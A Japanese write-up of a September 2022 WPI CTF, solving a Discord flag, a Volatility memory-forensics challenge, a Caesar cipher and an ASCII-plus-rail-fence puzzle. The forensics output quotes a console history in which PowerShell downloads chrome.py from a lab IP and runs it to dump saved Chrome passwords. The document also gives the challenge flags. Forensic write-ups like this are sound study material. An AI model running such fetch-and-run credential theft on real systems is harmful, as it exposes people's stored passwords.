この大会は2022/9/24 6:00(JST)~2022/9/26 6:00(JST)に開催されました。
今回もチームで参戦。結果は876点で244チーム中35位でした。
自分で解けた問題をWriteupとして書いておきます。
Welcome! (Misc 1)
Discordに入り、#rulesチャネルのメッセージを見ると、ルールの中にフラグが書いてあった。
WPI{d1sc0rd-rul3s-2022}
Copped Credentials (Forensics 200)
メモリフォレンジックの問題。
$ volatility -f memdump.raw imageinfo Volatility Foundation Volatility Framework 2.6 INFO : volatility.debug : Determining profile based on KDBG search... Suggested Profile(s) : Win7SP1x86_23418, Win7SP0x86, Win7SP1x86 AS Layer1 : IA32PagedMemory (Kernel AS) AS Layer2 : FileAddressSpace (/mnt/hgfs/Shared/work/memdump.raw) PAE type : No PAE DTB : 0x185000L KDBG : 0x82965378L Number of Processors : 2 Image Type (Service Pack) : 1 KPCR for CPU 0 : 0x80b96000L KPCR for CPU 1 : 0x80d9c000L KUSER_SHARED_DATA : 0xffdf0000L Image date and time : 2022-09-24 19:14:44 UTC+0000 Image local date and time : 2022-09-24 15:14:44 -0400 $ volatility -f memdump.raw --profile=Win7SP1x86_23418 pstree Volatility Foundation Volatility Framework 2.6 Name Pid PPid Thds Hnds Time -------------------------------------------------- ------ ------ ------ ------ ---- 0x85136d20:wininit.exe 404 352 3 78 2022-09-24 19:12:25 UTC+0000 . 0x85a94030:services.exe 460 404 20 230 2022-09-24 19:12:25 UTC+0000 .. 0x85b57828:svchost.exe 640 460 13 368 2022-09-24 19:12:26 UTC+0000 ... 0x84467750:WmiPrvSE.exe 3620 640 9 125 2022-09-24 19:14:22 UTC+0000 ... 0x844d8030:dllhost.exe 3272 640 6 79 2022-09-24 19:14:42 UTC+0000 ... 0x845f9d20:dllhost.exe 4064 640 0 ------ 2022-09-24 19:14:41 UTC+0000 .. 0x85c80bb8:svchost.exe 1416 460 23 338 2022-09-24 19:12:28 UTC+0000 .. 0x85cd5030:svchost.exe 1516 460 12 153 2022-09-24 19:12:28 UTC+0000 .. 0x85c8fd20:svchost.exe 1552 460 34 331 2022-09-24 19:12:28 UTC+0000 .. 0x84470640:svchost.exe 3352 460 9 341 2022-09-24 19:14:21 UTC+0000 .. 0x845b2030:mscorsvw.exe 2288 460 6 78 2022-09-24 19:14:30 UTC+0000 .. 0x8f2a1468:svchost.exe 808 460 31 596 2022-09-24 19:12:26 UTC+0000 ... 0x85bd6d20:audiodg.exe 1000 808 7 128 2022-09-24 19:12:27 UTC+0000 .. 0x85bd0030:svchost.exe 948 460 52 1118 2022-09-24 19:12:27 UTC+0000 ... 0x842d4bb8:taskeng.exe 580 948 7 86 2022-09-24 19:12:42 UTC+0000 .. 0x85d2c590:SearchIndexer. 1332 460 14 625 2022-09-24 19:12:52 UTC+0000 ... 0x845bed20:SearchProtocol 3156 1332 8 283 2022-09-24 19:14:33 UTC+0000 ... 0x84532a38:SearchFilterHo 3140 1332 5 101 2022-09-24 19:14:33 UTC+0000 .. 0x85b71030:VBoxService.ex 700 460 14 128 2022-09-24 19:12:26 UTC+0000 .. 0x845cbba0:sppsvc.exe 2052 460 6 153 2022-09-24 19:14:30 UTC+0000 .. 0x843ffa48:wmpnetwk.exe 3264 460 19 476 2022-09-24 19:14:21 UTC+0000 .. 0x85c632b0:spoolsv.exe 1364 460 16 306 2022-09-24 19:12:28 UTC+0000 .. 0x852cb940:taskhost.exe 356 460 10 182 2022-09-24 19:12:42 UTC+0000 .. 0x85bc07f0:svchost.exe 864 460 29 519 2022-09-24 19:12:27 UTC+0000 ... 0x86ab9480:dwm.exe 1224 864 6 97 2022-09-24 19:12:44 UTC+0000 .. 0x84613030:svchost.exe 2064 460 12 284 2022-09-24 19:14:30 UTC+0000 .. 0x85b7ec68:svchost.exe 756 460 9 294 2022-09-24 19:12:26 UTC+0000 .. 0x85bc46f8:svchost.exe 888 460 35 546 2022-09-24 19:12:27 UTC+0000 .. 0x85c36d20:svchost.exe 1236 460 23 424 2022-09-24 19:12:27 UTC+0000 . 0x85ad2b00:lsass.exe 476 404 11 757 2022-09-24 19:12:25 UTC+0000 . 0x85ae6600:lsm.exe 484 404 11 151 2022-09-24 19:12:25 UTC+0000 0x858de030:csrss.exe 364 352 9 550 2022-09-24 19:12:25 UTC+0000 0x85de3d20:explorer.exe 1980 1488 24 624 2022-09-24 19:12:44 UTC+0000 . 0x851a84d8:VBoxTray.exe 1372 1980 16 149 2022-09-24 19:12:44 UTC+0000 . 0x8534a5a0:chrome.exe 2608 1980 45 1043 2022-09-24 19:14:18 UTC+0000 .. 0x8467ad20:DumpIt.exe 3540 2608 2 40 2022-09-24 19:14:42 UTC+0000 .. 0x843b3a38:chrome.exe 2828 2608 17 247 2022-09-24 19:14:20 UTC+0000 .. 0x85db7d20:chrome.exe 2628 2608 9 75 2022-09-24 19:14:19 UTC+0000 .. 0x844814a8:chrome.exe 152 2608 17 244 2022-09-24 19:14:26 UTC+0000 .. 0x843d8380:chrome.exe 2892 2608 8 135 2022-09-24 19:14:20 UTC+0000 .. 0x84576918:chrome.exe 1776 2608 17 229 2022-09-24 19:14:28 UTC+0000 .. 0x844bed20:chrome.exe 3516 2608 12 181 2022-09-24 19:14:21 UTC+0000 . 0x85e91a68:cmd.exe 2124 1980 1 22 2022-09-24 19:12:54 UTC+0000 0x842339c8:System 4 0 90 541 2022-09-24 19:12:22 UTC+0000 . 0x852ac550:smss.exe 280 4 2 30 2022-09-24 19:12:22 UTC+0000 0x851a5598:csrss.exe 412 396 11 351 2022-09-24 19:12:25 UTC+0000 . 0x85e8ed20:conhost.exe 2132 412 3 52 2022-09-24 19:12:54 UTC+0000 . 0x845f87b0:conhost.exe 3196 412 2 52 2022-09-24 19:14:42 UTC+0000 0x8561a918:winlogon.exe 544 396 6 120 2022-09-24 19:12:26 UTC+0000 $ volatility -f memdump.raw --profile=Win7SP1x86_23418 consoles Volatility Foundation Volatility Framework 2.6 ************************************************** ConsoleProcess: conhost.exe Pid: 2132 Console: 0xa81c0 CommandHistorySize: 50 HistoryBufferCount: 3 HistoryBufferMax: 4 OriginalTitle: Command Prompt Title: Command Prompt AttachedProcess: cmd.exe Pid: 2124 Handle: 0x5c ---- CommandHistory: 0x3d8e50 Application: python.exe Flags: CommandCount: 0 LastAdded: -1 LastDisplayed: -1 FirstCommand: 0 CommandCountMax: 50 ProcessHandle: 0x0 ---- CommandHistory: 0x3d8d58 Application: powershell.exe Flags: CommandCount: 0 LastAdded: -1 LastDisplayed: -1 FirstCommand: 0 CommandCountMax: 50 ProcessHandle: 0x0 ---- CommandHistory: 0x3d8ae0 Application: cmd.exe Flags: Allocated, Reset CommandCount: 4 LastAdded: 3 LastDisplayed: 3 FirstCommand: 0 CommandCountMax: 50 ProcessHandle: 0x5c Cmd #0 at 0x3cf200: cd AppData\Local\Google\Chrome Cmd #1 at 0x3dcd18: powershell -c "Invoke-WebRequest http://192.168.56.107:8000/chrome.py -UseBasicParsing -OutFile 'chrome.py'" Cmd #2 at 0x3d6b18: dir Cmd #3 at 0x3d8d10: python chrome.py ---- Screen 0x3bcbc8 X:80 Y:300 Dump: Microsoft Windows [Version 6.1.7601] Copyright (c) 2009 Microsoft Corporation. All rights reserved. C:\Users\Ace>cd AppData\Local\Google\Chrome C:\Users\Ace\AppData\Local\Google\Chrome>powershell -c "Invoke-WebRequest http:/ /192.168.56.107:8000/chrome.py -UseBasicParsing -OutFile 'chrome.py'" C:\Users\Ace\AppData\Local\Google\Chrome>dir Volume in drive C has no label. Volume Serial Number is C055-775E Directory of C:\Users\Ace\AppData\Local\Google\Chrome 09/24/2022 03:11 PM <DIR> . 09/24/2022 03:11 PM <DIR> .. 09/24/2022 03:13 PM 4,553 chrome.py 09/24/2022 03:03 PM <DIR> User Data 1 File(s) 4,553 bytes 3 Dir(s) 21,991,317,504 bytes free C:\Users\Ace\AppData\Local\Google\Chrome>python chrome.py C:\Users\Ace\AppData\Local\Google\Chrome\User Data\Default\Login Data Sequence: 3 URL: https://www.reddit.com/login User Name: 0xExample Password: WPI{Chr0m4t1c_Th31v3ry} ************************************************** C:\Users\Ace\AppData\Local\Google\Chrome> ************************************************** ConsoleProcess: conhost.exe Pid: 3196 Console: 0xa81c0 CommandHistorySize: 50 HistoryBufferCount: 1 HistoryBufferMax: 4 OriginalTitle: C:\Users\Ace\Downloads\DumpIt.exe Title: C:\Users\Ace\Downloads\DumpIt.exe AttachedProcess: DumpIt.exe Pid: 3540 Handle: 0xc ---- CommandHistory: 0x279868 Application: DumpIt.exe Flags: Allocated CommandCount: 0 LastAdded: -1 LastDisplayed: -1 FirstCommand: 0 CommandCountMax: 50 ProcessHandle: 0xc ---- Screen 0x25ca60 X:80 Y:300 Dump: DumpIt - v1.3.2.20110401 - One click memory memory dumper Copyright (c) 2007 - 2011, Matthieu Suiche <http://www.msuiche.net> Copyright (c) 2010 - 2011, MoonSols <http://www.moonsols.com> Address space size: 1073676288 bytes ( 1023 Mb) Free space size: 21983485952 bytes ( 20965 Mb) * Destination = \??\C:\Users\Ace\Downloads\ACE-PC-20220924-191443.raw --> Are you sure you want to continue? [y/n] y + Processing...
途中パスワードにフラグが書かれていた。
WPI{Chr0m4t1c_Th31v3ry}
I <3 Salads (Crypto 50)
シーザー暗号。{}の中をhttps://www.geocachingtoolbox.com/index.php?lang=en&page=caesarCipherで復号。
Rotation 3: ettubrutus
WPI{ettubrutus}
Train Time (Crypto 100)
ASCIIコードとしてデコードする。
#!/usr/bin/env python3 enc = '087 103 095 048 055 080 103 052 097 095 104 048 097 051 073 085 099 103 099 099 095 050 056 123 104 104 103 104 111 051 057 057 125 099 118 048 053 053' enc = enc.split(' ') msg = ''.join([chr(int(c)) for c in enc]) print(msg)
デコードした結果は以下の通り。
Wg_07Pg4a_h0a3IUcgcc_28{hhgho399}cv055
Rail Fence Cipherと推測し、https://www.dcode.fr/rail-fence-cipherで復号する。レール数を5にしたときに、復号できた。
WPI{chUgg4chvgga__ch0och00_3592a73895}